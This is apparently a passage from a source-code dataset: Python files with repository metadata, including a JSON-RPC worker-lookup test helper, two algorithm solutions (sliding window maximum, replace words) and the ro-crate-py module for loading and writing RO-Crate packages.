('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_id', models.CharField(max_length=200, verbose_name='Customer ID')),
('event_type', models.CharField(max_length=200, verbose_name='Event Type')),
('data_obj', models.JSONField(verbose_name='Data Object')),
('event_info', models.JSONField(verbose_name='Full Event Data')),
],
),
]
| true | true |
f718fa9de893038d5ae56ecc48f2dcaf85abea50 | 2,969 | py | Python | tests/automation_framework/src/worker_lookup/worker_lookup_params.py | shresthichauhan/trusted-compute-framework | 1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7 | [
"Apache-2.0"
] | null | null | null | tests/automation_framework/src/worker_lookup/worker_lookup_params.py | shresthichauhan/trusted-compute-framework | 1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7 | [
"Apache-2.0"
] | null | null | null | tests/automation_framework/src/worker_lookup/worker_lookup_params.py | shresthichauhan/trusted-compute-framework | 1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
logger = logging.getLogger(__name__)
class WorkerLookUp():
    """Builds (and optionally tampers) JSON-RPC ``WorkerLookUp`` requests.

    The object keeps the JSON-RPC envelope in ``id_obj`` and the request
    parameters in ``params_obj``; test code customizes both before the
    request is serialized by :meth:`to_string` / :meth:`configure_data`.
    """

    def __init__(self):
        # JSON-RPC envelope; "params" is attached at serialization time.
        self.id_obj = {"jsonrpc": "2.0", "method": "WorkerLookUp", "id": 1}
        self.params_obj = {}
        self.request_mode = "file"
        # Extra parameters to inject verbatim into the request.
        self.tamper = {"params": {}}
        self.output_json_file_name = "worker_lookup"

    def add_json_values(self, input_json_temp, tamper):
        """Populate the request from a test-input JSON plus tamper values.

        An empty workerType falls back to 1 (SGX); an absent workerType
        leaves the parameters untouched.
        """
        if "workerType" in input_json_temp["params"]:
            if input_json_temp["params"]["workerType"] != "":
                self.set_worker_type(input_json_temp["params"]["workerType"])
            else:
                # Empty value: use the default worker type (1 == SGX).
                self.set_worker_type(1)

        if "id" in input_json_temp:
            self.set_request_id(input_json_temp["id"])

        # Inject tamper parameters as-is (unknown keys included).
        for param, value in tamper["params"].items():
            self.set_unknown_parameter(param, value)

    def set_unknown_parameter(self, param, value):
        """Set an arbitrary (possibly invalid) request parameter."""
        self.params_obj[param] = value

    def set_worker_type(self, worker_type):
        """Set the workerType request parameter."""
        self.params_obj["workerType"] = worker_type

    def set_request_id(self, request_id):
        """Set the JSON-RPC request id."""
        self.id_obj["id"] = request_id

    def get_params(self):
        """Return a shallow copy of the current request parameters."""
        return self.params_obj.copy()

    def to_string(self):
        """Serialize the full JSON-RPC request as pretty-printed JSON.

        Works on a copy of ``id_obj``: the previous implementation aliased
        the instance dict and permanently injected a "params" key into it
        as a side effect of serialization.
        """
        json_rpc_request = self.id_obj.copy()
        json_rpc_request["params"] = self.get_params()
        return json.dumps(json_rpc_request, indent=4)

    def configure_data(
            self, input_json, worker_obj, pre_test_response):
        """Build the request dict for the file-based test flow.

        With no input JSON, a default SGX (workerType 1) request is built;
        otherwise the input plus ``self.tamper`` is applied.
        """
        if input_json is None:
            self.set_worker_type(1)
        else:
            self.add_json_values(input_json, self.tamper)
        # Round-trip through the serializer so the result matches exactly
        # what would be written to the request file.
        return json.loads(self.to_string())

    def configure_data_sdk(
            self, input_json, worker_obj, pre_test_response):
        """Extract the worker type string for the SDK test flow.

        Returns 'SGX'/'MPC'/'ZK' for 1/2/3, the raw value for any other
        workerType, 'SGX' when ``input_json`` is None, and "" when the
        workerType lookup fails.
        """
        if input_json is None:
            return 'SGX'
        try:
            worker_value = input_json["params"]["workerType"]
        except LookupError:
            # Missing "params" or "workerType" key.
            return ""
        if worker_value == 1:
            return 'SGX'
        if worker_value == 2:
            return 'MPC'
        if worker_value == 3:
            return 'ZK'
        return worker_value
| 31.924731 | 77 | 0.613675 |
import json
import logging
logger = logging.getLogger(__name__)
class WorkerLookUp():
def __init__(self):
self.id_obj = {"jsonrpc": "2.0", "method": "WorkerLookUp", "id": 1}
self.params_obj = {}
self.request_mode = "file"
self.tamper = {"params": {}}
self.output_json_file_name = "worker_lookup"
def add_json_values(self, input_json_temp, tamper):
if "workerType" in input_json_temp["params"].keys():
if input_json_temp["params"]["workerType"] != "":
self.set_worker_type(input_json_temp["params"]["workerType"])
else:
self.set_worker_type(1)
if "id" in input_json_temp.keys():
self.set_request_id(input_json_temp["id"])
for key in tamper["params"].keys():
param = key
value = tamper["params"][key]
self.set_unknown_parameter(param, value)
def set_unknown_parameter(self, param, value):
self.params_obj[param] = value
def set_worker_type(self, worker_type):
self.params_obj["workerType"] = worker_type
def set_request_id(self, request_id):
self.id_obj["id"] = request_id
def get_params(self):
return self.params_obj.copy()
def to_string(self):
json_rpc_request = self.id_obj
json_rpc_request["params"] = self.get_params()
return json.dumps(json_rpc_request, indent=4)
def configure_data(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
self.set_worker_type(1)
else:
self.add_json_values(input_json, self.tamper)
final_json = json.loads(self.to_string())
return final_json
def configure_data_sdk(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
worker_type = 'SGX'
else:
try:
worker_value = input_json["params"]["workerType"]
if worker_value == 1:
worker_type = 'SGX'
elif worker_value == 2:
worker_type = 'MPC'
elif worker_value == 3:
worker_type = 'ZK'
else:
worker_type = worker_value
except LookupError:
worker_type = ""
return worker_type
| true | true |
f718fb16220b88d0cf774ed5e6300836f3128f5c | 1,055 | py | Python | solutions/sliding_window_maximum/solution.py | ansonmiu0214/dsa-worked-solutions | 88801d268b78506edd77e771c29b4c9f4ae0f59a | [
"MIT"
] | null | null | null | solutions/sliding_window_maximum/solution.py | ansonmiu0214/dsa-worked-solutions | 88801d268b78506edd77e771c29b4c9f4ae0f59a | [
"MIT"
] | null | null | null | solutions/sliding_window_maximum/solution.py | ansonmiu0214/dsa-worked-solutions | 88801d268b78506edd77e771c29b4c9f4ae0f59a | [
"MIT"
] | null | null | null | from collections import deque
from typing import List
def maxSlidingWindow(nums: List[int], k: int) -> List[int]:
    """Return the maximum of each sliding window of size ``k`` over ``nums``.

    Uses a monotonically decreasing deque of candidate indices, giving
    O(n) time overall: every index is appended and popped at most once.
    """
    window_max: List[int] = []
    candidates: deque = deque()

    for right, value in enumerate(nums):
        # Evict indices that have slid out of the window on the left.
        while candidates and candidates[0] <= right - k:
            candidates.popleft()
        # Evict smaller values: they can never be a window maximum while
        # the current (larger, newer) value is still in scope.
        while candidates and nums[candidates[-1]] <= value:
            candidates.pop()
        candidates.append(right)
        # The first full window ends at index k-1; from then on the front
        # of the deque is the current window's maximum.
        if right >= k - 1:
            window_max.append(nums[candidates[0]])

    return window_max
from typing import List
def maxSlidingWindow(nums: List[int], k: int) -> List[int]:
maxWindow = []
maxIdxs = deque([0])
for i, num in enumerate(nums):
leftBoundary = i - k
while maxIdxs and maxIdxs[0] <= leftBoundary:
maxIdxs.popleft()
while maxIdxs and num >= nums[maxIdxs[-1]]:
# considered 'max candidates since 'num' is larger and also
maxIdxs.pop()
maxIdxs.append(i)
if i >= k - 1:
maxWindow.append(nums[maxIdxs[0]])
return maxWindow | true | true |
f718fb322a11e301def104bf6bbcf5c5efdc385b | 1,066 | py | Python | algorithms/648. Replace Words.py | woozway/py3-leetcode | e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf | [
"MIT"
] | 1 | 2020-12-02T13:54:30.000Z | 2020-12-02T13:54:30.000Z | algorithms/648. Replace Words.py | woozway/py3-leetcode | e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf | [
"MIT"
] | null | null | null | algorithms/648. Replace Words.py | woozway/py3-leetcode | e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf | [
"MIT"
] | null | null | null | """
1. Clarification
2. Possible solutions
- Prefix Hash
- Trie
3. Coding
4. Tests
"""
# T=O(sigma(wi^2)), S=O(n), wi=len(i-th word)
class Solution:
    def replaceWords(self, dictionary: List[str], sentence: str) -> str:
        """Replace each word with its shortest dictionary root, if any.

        Checks every proper prefix of a word (shortest first) against the
        root set; words with no matching root are kept unchanged.
        """
        roots = set(dictionary)

        def shortest_root(token: str) -> str:
            for end in range(1, len(token)):
                prefix = token[:end]
                if prefix in roots:
                    return prefix
            return token

        return ' '.join(shortest_root(token) for token in sentence.split())
# T=O(n), S=O(n)
class Solution:
    def replaceWords(self, dictionary: List[str], sentence: str) -> str:
        """Replace each word with its shortest dictionary root using a trie.

        O(total characters): each word walks the trie until it either hits
        a root terminator or falls off the trie.
        """
        END = True  # terminator key marking "a root ends at this node"

        # Build the trie with plain nested dicts.
        trie: dict = {}
        for root in dictionary:
            node = trie
            for ch in root:
                node = node.setdefault(ch, {})
            node[END] = root

        def shorten(word: str) -> str:
            node = trie
            for ch in word:
                # Stop at the first root found, or when the trie runs out.
                if ch not in node or END in node:
                    break
                node = node[ch]
            return node.get(END, word)

        return ' '.join(map(shorten, sentence.split()))
| 26.65 | 72 | 0.54878 |
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
for i in range(1, len(word)):
if word[:i] in rootset:
return word[:i]
return word
rootset = set(dictionary)
return ' '.join(map(replace, sentence.split()))
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
cur = trie
for letter in word:
if letter not in cur or END in cur: break
cur = cur[letter]
return cur.get(END, word)
Trie = lambda: collections.defaultdict(Trie)
trie = Trie()
END = True
for root in dictionary:
functools.reduce(dict.__getitem__, root, trie)[END] = root
return ' '.join(map(replace, sentence.split()))
| true | true |
f718fb6285f131a554f6e66796002cf04bdb687c | 16,091 | py | Python | rocrate/rocrate.py | sourav0220/ro-crate-py | e279fc7ddf188f0b22b671ab9c670f3333b477e1 | [
"Apache-2.0"
] | null | null | null | rocrate/rocrate.py | sourav0220/ro-crate-py | e279fc7ddf188f0b22b671ab9c670f3333b477e1 | [
"Apache-2.0"
] | null | null | null | rocrate/rocrate.py | sourav0220/ro-crate-py | e279fc7ddf188f0b22b671ab9c670f3333b477e1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2019-2020 The University of Manchester, UK
# Copyright 2020 Vlaams Instituut voor Biotechnologie (VIB), BE
# Copyright 2020 Barcelona Supercomputing Center (BSC), ES
# Copyright 2020 Center for Advanced Studies, Research and Development in Sardinia (CRS4), IT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
import json
import os
import uuid
import requests
import zipfile
import atexit
import shutil
import tempfile
from pathlib import Path
from .model import contextentity
from .model.root_dataset import RootDataset
from .model.file import File
from .model.person import Person
from .model.dataset import Dataset
from .model.metadata import Metadata, LegacyMetadata
from .model.preview import Preview
from arcp import generate
TEST_METADATA_BASENAME = "test-metadata.json"
class ROCrate():
    def __init__(self, source_path=None, load_preview=False):
        """Create a new RO-Crate, or load an existing one from ``source_path``.

        Args:
            source_path: Directory or zip file of an existing RO-Crate to
                load. When ``None``, a fresh empty crate is created.
            load_preview: When loading an existing crate, reuse its HTML
                preview instead of generating a new Preview entity here.
        """
        self.default_entities = []
        self.data_entities = []
        self.contextual_entities = []
        # TODO: add this as @base in the context? At least when loading
        # from zip
        self.uuid = uuid.uuid4()
        # TODO: default_properties must include name, description,
        # datePublished, license
        if not source_path or not load_preview:
            # create preview entity and add it to default_entities
            self.preview = Preview(self)
            self.default_entities.append(self.preview)
        if not source_path:
            # create a new ro-crate
            self.root_dataset = RootDataset(self)
            self.default_entities.append(self.root_dataset)
            self.metadata = Metadata(self)
            self.default_entities.append(self.metadata)
        else:
            # load an existing ro-crate
            if zipfile.is_zipfile(source_path):
                # Extract the zip to a temp dir that is removed at
                # interpreter exit, then load from there.
                zip_path = tempfile.mkdtemp(prefix="ro", suffix="crate")
                atexit.register(shutil.rmtree, zip_path)
                with zipfile.ZipFile(source_path, "r") as zip_file:
                    zip_file.extractall(zip_path)
                source_path = zip_path
            # Prefer the 1.1 metadata basename, fall back to the legacy one.
            metadata_path = os.path.join(source_path, Metadata.BASENAME)
            MetadataClass = Metadata
            if not os.path.isfile(metadata_path):
                metadata_path = os.path.join(source_path, LegacyMetadata.BASENAME)
                MetadataClass = LegacyMetadata
            if not os.path.isfile(metadata_path):
                raise ValueError('The directory is not a valid RO-crate, '
                                 f'missing {Metadata.BASENAME}')
            self.metadata = MetadataClass(self)
            self.default_entities.append(self.metadata)
            entities = self.entities_from_metadata(metadata_path)
            self.build_crate(entities, source_path, load_preview)
# TODO: load root dataset properties
def entities_from_metadata(self, metadata_path):
# Creates a dictionary {id: entity} from the metadata file
with open(metadata_path) as metadata_file:
metadata_jsonld = json.load(metadata_file)
# TODO: should validate the json-ld
if '@graph' in metadata_jsonld.keys():
entities_dict = {}
for entity in metadata_jsonld['@graph']:
entities_dict[entity['@id']] = entity
# print(entity)
return entities_dict
else:
raise ValueError('The metadata file has no @graph')
    def find_root_entity_id(self, entities) -> tuple:
        """Find Metadata file and Root Data Entity in RO-Crate.

        Returns a tuple of the @id identifiers (metadata, root); the
        metadata id is None when only a bare root dataset is found.

        Raises:
            KeyError: If no Root Data Entity can be located.
        """
        # Note that for all cases below we will deliberately
        # throw KeyError if "about" exists but it has no "@id"

        # First let's try conformsTo algorithm in
        # <https://www.researchobject.org/ro-crate/1.1/root-data-entity.html#finding-the-root-data-entity>
        for entity in entities.values():
            conformsTo = entity.get("conformsTo")
            # NOTE(review): JSON-LD allows conformsTo to be a list; a list
            # would fail the startswith call below — confirm inputs are
            # normalized to a single object upstream.
            if conformsTo and "@id" in conformsTo:
                conformsTo = conformsTo["@id"]
            if conformsTo and conformsTo.startswith("https://w3id.org/ro/crate/"):
                if "about" in entity:
                    return (entity["@id"], entity["about"]["@id"])
        # ..fall back to a generous look up by filename,
        for candidate in (
            Metadata.BASENAME, LegacyMetadata.BASENAME,
            f"./{Metadata.BASENAME}", f"./{LegacyMetadata.BASENAME}"
        ):
            metadata_file = entities.get(candidate)
            if metadata_file and "about" in metadata_file:
                return (metadata_file["@id"], metadata_file["about"]["@id"])
        # No luck! Is there perhaps a root dataset directly in here?
        root = entities.get("./", {})
        # FIXME: below will work both for
        # "@type": "Dataset"
        # "@type": ["Dataset"]
        # ..but also the unlikely
        # "@type": "DatasetSomething"
        if root and "Dataset" in root.get("@type", []):
            return (None, "./")
        # Uh oh..
        raise KeyError("Can't find Root Data Entity in RO-Crate, see https://www.researchobject.org/ro-crate/1.1/root-data-entity.html")
    def build_crate(self, entities, source, load_preview):
        """Populate this crate from a parsed entities dict.

        Registers the root dataset, optional preview, every data entity
        listed in the root's ``hasPart``, and the remaining entities as
        contextual entities. ``source`` is the crate's directory on disk.
        """
        # add data and contextual entities to the crate
        (metadata_id, root_id) = self.find_root_entity_id(entities)
        root_entity = entities[root_id]
        root_entity_parts = root_entity['hasPart']
        # remove hasPart and id from root_entity and add the rest of the
        # properties to the build
        root_entity.pop('@id', None)
        root_entity.pop('hasPart', None)
        self.root_dataset = RootDataset(self, root_entity)
        self.default_entities.append(self.root_dataset)
        # check if a preview is present
        if Preview.BASENAME in entities.keys() and load_preview:
            preview_source = os.path.join(source, Preview.BASENAME)
            self.preview = Preview(self, preview_source)
            self.default_entities.append(self.preview)
        added_entities = []
        # iterate over data entities
        for data_entity_ref in root_entity_parts:
            data_entity_id = data_entity_ref['@id']
            entity = entities[data_entity_id]
            # basic checks should be moved to a separate function
            if '@type' not in entity.keys():
                raise Exception("Entity with @id:" + data_entity_id +
                                " has no type defined")
            # Data entities can have an array as @type. So far we just parse
            # them as File class if File is in the list. For further
            # extensions (e.g if a Workflow class is created) we can add extra
            # cases or create a mapping table for specific combinations. See
            # https://github.com/ResearchObject/ro-crate/issues/83
            entity_types = (entity['@type']
                            if isinstance(entity['@type'], list)
                            else [entity['@type']])
            if 'File' in entity_types:
                file_path = os.path.join(source, entity['@id'])
                identifier = entity.pop('@id', None)
                if os.path.exists(file_path):
                    # referencing a file path relative to crate-root
                    instance = File(self, file_path, identifier, properties=entity)
                else:
                    # check if it is a valid absolute URI
                    try:
                        requests.get(identifier)
                        instance = File(self, identifier, properties=entity)
                    except requests.ConnectionError:
                        # NOTE(review): on ConnectionError `instance` is left
                        # unbound (first iteration) or stale (later ones), so
                        # _add_data_entity below may raise NameError or re-add
                        # the previous entity — confirm intended behavior.
                        print("Source is not a valid URI")
            if 'Dataset' in entity_types:
                dir_path = os.path.join(source, entity['@id'])
                if os.path.exists(dir_path):
                    props = {k: v for k, v in entity.items() if k != '@id'}
                    instance = Dataset(self, dir_path, entity['@id'], props)
                else:
                    raise Exception('Directory not found')
            self._add_data_entity(instance)
            added_entities.append(data_entity_id)
        # the rest of the entities must be contextual entities
        prebuilt_entities = [
            root_id, metadata_id, Preview.BASENAME
        ]
        for identifier, entity in entities.items():
            if identifier not in added_entities + prebuilt_entities:
                # should this be done in the extract entities?
                entity.pop('@id', None)
                # contextual entities should not have @type array
                # (see https://github.com/ResearchObject/ro-crate/issues/83)
                # If a dedicated ContextEntity subclass exists for this
                # @type, import and instantiate it by naming convention.
                if entity['@type'] in [
                    cls.__name__
                    for cls in contextentity.ContextEntity.__subclasses__()
                ]:
                    module_name = 'rocrate.model.' + entity['@type'].lower()
                    SubClass = getattr(
                        importlib.import_module(module_name, package=None),
                        entity['@type']
                    )
                    instance = SubClass(self, identifier, entity)
                else:
                    instance = contextentity.ContextEntity(
                        self, identifier, entity
                    )
                self._add_context_entity(instance)
        # TODO: add contextual entities
        # def add_contact_point(id, properties = {})
        # def add_organization(id, properties = {})
        # add properties: name datePublished author license identifier
        # distribution contactPoint publisher funder description url hasPart.
        # publisher should be an Organization though it MAY be a Person. funder
        # should reference an Organization
    # --- Root-dataset convenience accessors ---------------------------------
    # Each property below proxies exactly one JSON-LD key on the root
    # Dataset entity, e.g. ``crate.name`` reads/writes root_dataset['name'].
    @property
    def name(self):
        """Crate name (root dataset ``name``)."""
        return self.root_dataset['name']
    @name.setter
    def name(self, value):
        self.root_dataset['name'] = value
    @property
    def datePublished(self):
        """Publication date; delegates to a root-dataset attribute rather
        than item access, unlike the other properties here."""
        return self.root_dataset.datePublished
    @datePublished.setter
    def datePublished(self, value):
        self.root_dataset.datePublished = value
    @property
    def creator(self):
        """Crate creator (root dataset ``creator``)."""
        return self.root_dataset['creator']
    @creator.setter
    def creator(self, value):
        self.root_dataset['creator'] = value
    @property
    def license(self):
        """Crate license (root dataset ``license``)."""
        return self.root_dataset['license']
    @license.setter
    def license(self, value):
        self.root_dataset['license'] = value
    @property
    def description(self):
        """Crate description (root dataset ``description``)."""
        return self.root_dataset['description']
    @description.setter
    def description(self, value):
        self.root_dataset['description'] = value
    @property
    def keywords(self):
        """Crate keywords (root dataset ``keywords``)."""
        return self.root_dataset['keywords']
    @keywords.setter
    def keywords(self, value):
        self.root_dataset['keywords'] = value
    @property
    def publisher(self):
        """Crate publisher (root dataset ``publisher``)."""
        return self.root_dataset['publisher']
    @publisher.setter
    def publisher(self, value):
        self.root_dataset['publisher'] = value
    @property
    def isBasedOn(self):
        """Source work this crate is based on (root dataset ``isBasedOn``)."""
        return self.root_dataset['isBasedOn']
    @isBasedOn.setter
    def isBasedOn(self, value):
        self.root_dataset['isBasedOn'] = value
    @property
    def image(self):
        """Crate image (root dataset ``image``)."""
        return self.root_dataset['image']
    @image.setter
    def image(self, value):
        self.root_dataset['image'] = value
    @property
    def CreativeWorkStatus(self):
        """Creative work status (root dataset ``CreativeWorkStatus``)."""
        return self.root_dataset['CreativeWorkStatus']
    @CreativeWorkStatus.setter
    def CreativeWorkStatus(self, value):
        self.root_dataset['CreativeWorkStatus'] = value
    @property
    def test_dir(self):
        """The crate's "test" entity if it exists and is a Dataset, else None."""
        rval = self.dereference("test")
        if rval and "Dataset" in rval.type:
            return rval
        return None
    @property
    def examples_dir(self):
        """The crate's "examples" entity if it exists and is a Dataset, else None."""
        rval = self.dereference("examples")
        if rval and "Dataset" in rval.type:
            return rval
        return None
    @property
    def test_metadata_path(self):
        """Path to the test metadata file inside test_dir, or None if absent."""
        if self.test_dir is None:
            return None
        return Path(self.test_dir.filepath()) / TEST_METADATA_BASENAME
    def resolve_id(self, relative_id):
        """Resolve *relative_id* to this crate's canonical arcp URI (seeded by self.uuid)."""
        return generate.arcp_random(relative_id.strip('./'), uuid=self.uuid)
def get_entities(self):
return (self.default_entities + self.data_entities +
self.contextual_entities)
    def set_main_entity(self, main_entity):
        """Record *main_entity* as the root dataset's ``mainEntity`` property."""
        self.root_dataset['mainEntity'] = main_entity
def _get_root_jsonld(self):
self.root_dataset.properties()
def dereference(self, entity_id):
canonical_id = self.resolve_id(entity_id)
for entity in self.get_entities():
if canonical_id == entity.canonical_id():
return entity
return None
    # source: file object or path (str)
    def add_file(self, source, crate_path=None, fetch_remote=False,
                 properties={}, **kwargs):
        """Add a File data entity to the crate and return it.

        Extra keyword arguments are merged into *properties*.
        NOTE(review): the mutable default ``properties={}`` is safe here
        only because it is copied (``dict(properties)``), never mutated.
        """
        props = dict(properties)
        props.update(kwargs)
        file_entity = File(self, source=source, dest_path=crate_path, fetch_remote=fetch_remote, properties=props)
        self._add_data_entity(file_entity)
        return file_entity
    def remove_file(self, file_id):
        """Remove the file with *file_id* from the crate's data entities."""
        # if file in data_entities:
        self._remove_data_entity(file_id)
def add_directory(self, source, crate_path=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
dataset_entity = Dataset(self, source, crate_path, properties)
self._add_data_entity(dataset_entity)
return dataset_entity
    def remove_directory(self, dir_id):
        """Remove the directory entity with *dir_id* from the data entities."""
        # if file in data_entities:
        self._remove_data_entity(dir_id)
    def _add_data_entity(self, data_entity):
        """Append *data_entity*, first dropping any existing copy (no duplicates)."""
        self._remove_data_entity(data_entity)
        self.data_entities.append(data_entity)
    def _remove_data_entity(self, data_entity):
        """Remove *data_entity* from the data entities if present (no-op otherwise)."""
        if data_entity in self.data_entities:
            self.data_entities.remove(data_entity)
    ################################
    # Contextual entities          #
    ################################
    def _add_context_entity(self, entity):
        """Append *entity* to the contextual entities, replacing any existing copy."""
        if entity in self.contextual_entities:
            self.contextual_entities.remove(entity)
        self.contextual_entities.append(entity)
    def add_person(self, identifier=None, properties={}, **kwargs):
        """Create a Person contextual entity, register it, and return it.

        Extra keyword arguments are merged into *properties* (which is
        copied, so the mutable default is never mutated).
        """
        props = dict(properties)
        props.update(kwargs)
        new_person = Person(self, identifier, props)
        self._add_context_entity(new_person)
        return new_person
# TODO
# def fetch_all(self):
# fetch all files defined in the crate
# write crate to local dir
def write_crate(self, base_path):
Path(base_path).mkdir(parents=True, exist_ok=True)
# write data entities
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write(base_path)
def write_zip(self, out_zip):
if str(out_zip).endswith('.zip'):
out_file_path = out_zip
else:
out_file_path = out_zip + '.zip'
zf = zipfile.ZipFile(
out_file_path, 'w', compression=zipfile.ZIP_DEFLATED,
allowZip64=True
)
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write_zip(zf)
zf.close()
return zf.filename
| 37.42093 | 136 | 0.618358 |
import importlib
import json
import os
import uuid
import requests
import zipfile
import atexit
import shutil
import tempfile
from pathlib import Path
from .model import contextentity
from .model.root_dataset import RootDataset
from .model.file import File
from .model.person import Person
from .model.dataset import Dataset
from .model.metadata import Metadata, LegacyMetadata
from .model.preview import Preview
from arcp import generate
TEST_METADATA_BASENAME = "test-metadata.json"
class ROCrate():
def __init__(self, source_path=None, load_preview=False):
self.default_entities = []
self.data_entities = []
self.contextual_entities = []
self.uuid = uuid.uuid4()
if not source_path or not load_preview:
self.preview = Preview(self)
self.default_entities.append(self.preview)
if not source_path:
self.root_dataset = RootDataset(self)
self.default_entities.append(self.root_dataset)
self.metadata = Metadata(self)
self.default_entities.append(self.metadata)
else:
if zipfile.is_zipfile(source_path):
zip_path = tempfile.mkdtemp(prefix="ro", suffix="crate")
atexit.register(shutil.rmtree, zip_path)
with zipfile.ZipFile(source_path, "r") as zip_file:
zip_file.extractall(zip_path)
source_path = zip_path
metadata_path = os.path.join(source_path, Metadata.BASENAME)
MetadataClass = Metadata
if not os.path.isfile(metadata_path):
metadata_path = os.path.join(source_path, LegacyMetadata.BASENAME)
MetadataClass = LegacyMetadata
if not os.path.isfile(metadata_path):
raise ValueError('The directory is not a valid RO-crate, '
f'missing {Metadata.BASENAME}')
self.metadata = MetadataClass(self)
self.default_entities.append(self.metadata)
entities = self.entities_from_metadata(metadata_path)
self.build_crate(entities, source_path, load_preview)
def entities_from_metadata(self, metadata_path):
with open(metadata_path) as metadata_file:
metadata_jsonld = json.load(metadata_file)
if '@graph' in metadata_jsonld.keys():
entities_dict = {}
for entity in metadata_jsonld['@graph']:
entities_dict[entity['@id']] = entity
return entities_dict
else:
raise ValueError('The metadata file has no @graph')
def find_root_entity_id(self, entities):
# <https://www.researchobject.org/ro-crate/1.1/root-data-entity.html#finding-the-root-data-entity>
for entity in entities.values():
conformsTo = entity.get("conformsTo")
if conformsTo and "@id" in conformsTo:
conformsTo = conformsTo["@id"]
if conformsTo and conformsTo.startswith("https://w3id.org/ro/crate/"):
if "about" in entity:
return (entity["@id"], entity["about"]["@id"])
# ..fall back to a generous look up by filename,
for candidate in (
Metadata.BASENAME, LegacyMetadata.BASENAME,
f"./{Metadata.BASENAME}", f"./{LegacyMetadata.BASENAME}"
):
metadata_file = entities.get(candidate)
if metadata_file and "about" in metadata_file:
return (metadata_file["@id"], metadata_file["about"]["@id"])
# No luck! Is there perhaps a root dataset directly in here?
root = entities.get("./", {})
# FIXME: below will work both for
# "@type": "Dataset"
# "@type": ["Dataset"]
# ..but also the unlikely
# "@type": "DatasetSomething"
if root and "Dataset" in root.get("@type", []):
return (None, "./")
# Uh oh..
raise KeyError("Can't find Root Data Entity in RO-Crate, see https://www.researchobject.org/ro-crate/1.1/root-data-entity.html")
def build_crate(self, entities, source, load_preview):
(metadata_id, root_id) = self.find_root_entity_id(entities)
root_entity = entities[root_id]
root_entity_parts = root_entity['hasPart']
root_entity.pop('@id', None)
root_entity.pop('hasPart', None)
self.root_dataset = RootDataset(self, root_entity)
self.default_entities.append(self.root_dataset)
if Preview.BASENAME in entities.keys() and load_preview:
preview_source = os.path.join(source, Preview.BASENAME)
self.preview = Preview(self, preview_source)
self.default_entities.append(self.preview)
added_entities = []
for data_entity_ref in root_entity_parts:
data_entity_id = data_entity_ref['@id']
entity = entities[data_entity_id]
if '@type' not in entity.keys():
raise Exception("Entity with @id:" + data_entity_id +
" has no type defined")
entity_types = (entity['@type']
if isinstance(entity['@type'], list)
else [entity['@type']])
if 'File' in entity_types:
file_path = os.path.join(source, entity['@id'])
identifier = entity.pop('@id', None)
if os.path.exists(file_path):
instance = File(self, file_path, identifier, properties=entity)
else:
try:
requests.get(identifier)
instance = File(self, identifier, properties=entity)
except requests.ConnectionError:
print("Source is not a valid URI")
if 'Dataset' in entity_types:
dir_path = os.path.join(source, entity['@id'])
if os.path.exists(dir_path):
props = {k: v for k, v in entity.items() if k != '@id'}
instance = Dataset(self, dir_path, entity['@id'], props)
else:
raise Exception('Directory not found')
self._add_data_entity(instance)
added_entities.append(data_entity_id)
prebuilt_entities = [
root_id, metadata_id, Preview.BASENAME
]
for identifier, entity in entities.items():
if identifier not in added_entities + prebuilt_entities:
entity.pop('@id', None)
if entity['@type'] in [
cls.__name__
for cls in contextentity.ContextEntity.__subclasses__()
]:
module_name = 'rocrate.model.' + entity['@type'].lower()
SubClass = getattr(
importlib.import_module(module_name, package=None),
entity['@type']
)
instance = SubClass(self, identifier, entity)
else:
instance = contextentity.ContextEntity(
self, identifier, entity
)
self._add_context_entity(instance)
@property
def name(self):
return self.root_dataset['name']
@name.setter
def name(self, value):
self.root_dataset['name'] = value
@property
def datePublished(self):
return self.root_dataset.datePublished
@datePublished.setter
def datePublished(self, value):
self.root_dataset.datePublished = value
@property
def creator(self):
return self.root_dataset['creator']
@creator.setter
def creator(self, value):
self.root_dataset['creator'] = value
@property
def license(self):
return self.root_dataset['license']
@license.setter
def license(self, value):
self.root_dataset['license'] = value
@property
def description(self):
return self.root_dataset['description']
@description.setter
def description(self, value):
self.root_dataset['description'] = value
@property
def keywords(self):
return self.root_dataset['keywords']
@keywords.setter
def keywords(self, value):
self.root_dataset['keywords'] = value
@property
def publisher(self):
return self.root_dataset['publisher']
@publisher.setter
def publisher(self, value):
self.root_dataset['publisher'] = value
@property
def isBasedOn(self):
return self.root_dataset['isBasedOn']
@isBasedOn.setter
def isBasedOn(self, value):
self.root_dataset['isBasedOn'] = value
@property
def image(self):
return self.root_dataset['image']
@image.setter
def image(self, value):
self.root_dataset['image'] = value
@property
def CreativeWorkStatus(self):
return self.root_dataset['CreativeWorkStatus']
@CreativeWorkStatus.setter
def CreativeWorkStatus(self, value):
self.root_dataset['CreativeWorkStatus'] = value
@property
def test_dir(self):
rval = self.dereference("test")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def examples_dir(self):
rval = self.dereference("examples")
